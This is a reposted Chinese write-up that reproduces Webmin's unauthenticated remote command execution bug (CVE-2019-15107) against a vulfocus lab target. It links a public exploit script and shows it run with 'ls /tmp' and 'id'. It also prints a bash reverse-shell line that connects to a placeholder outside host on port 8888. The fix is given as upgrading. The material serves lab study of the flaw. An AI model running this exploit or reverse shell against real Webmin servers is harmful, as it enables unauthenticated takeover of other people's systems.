栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > Python

webmin 远程命令执行 (CVE-2019-15107)复现

Python 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

webmin 远程命令执行 (CVE-2019-15107)复现

Webmin漏洞
  • 前言
  • webmin 远程命令执行 (CVE-2019-15107)
    • 0x01 漏洞描述
    • 0x02 影响范围
    • 0x03 漏洞复现
      • 命令执行
      • 反弹shell
    • 0x04 漏洞修复


前言

Webmin是Webmin社区的一套基于Web的用于类Unix操作系统中的系统管理工具。

webmin 远程命令执行 (CVE-2019-15107) 0x01 漏洞描述

Webmin是一套基于Web的用于类Unix操作系统中的系统管理工具。 当用户开启Webmin密码重置功能后,攻击者可以通过发送POST请求在目标系统中执行任意命令,且无需身份验证。

0x02 影响范围

Webmin <= 1.920

0x03 漏洞复现

(1)访问靶场

要求使用https访问
(2)

(3)脚本利用
python2 运行

https://github.com/jas502n/CVE-2019-15107
命令执行
python CVE_2019_15107.py https://vulfocus.fofa.so:16241 "ls /tmp"


id

 python CVE_2019_15107.py https://vulfocus.fofa.so:20763 "id"

反弹shell
bash -c "bash -i >& /dev/tcp/x.x.x.x/8888 0>&1"

用bpurl编码

python2 CVE_2019_15107.py  https://vulfocus.fofa.so:26004 "编码后的命令"

脚本执行情况如下

反弹shell成功

0x04 漏洞修复

升级到最新版本

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/468674.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号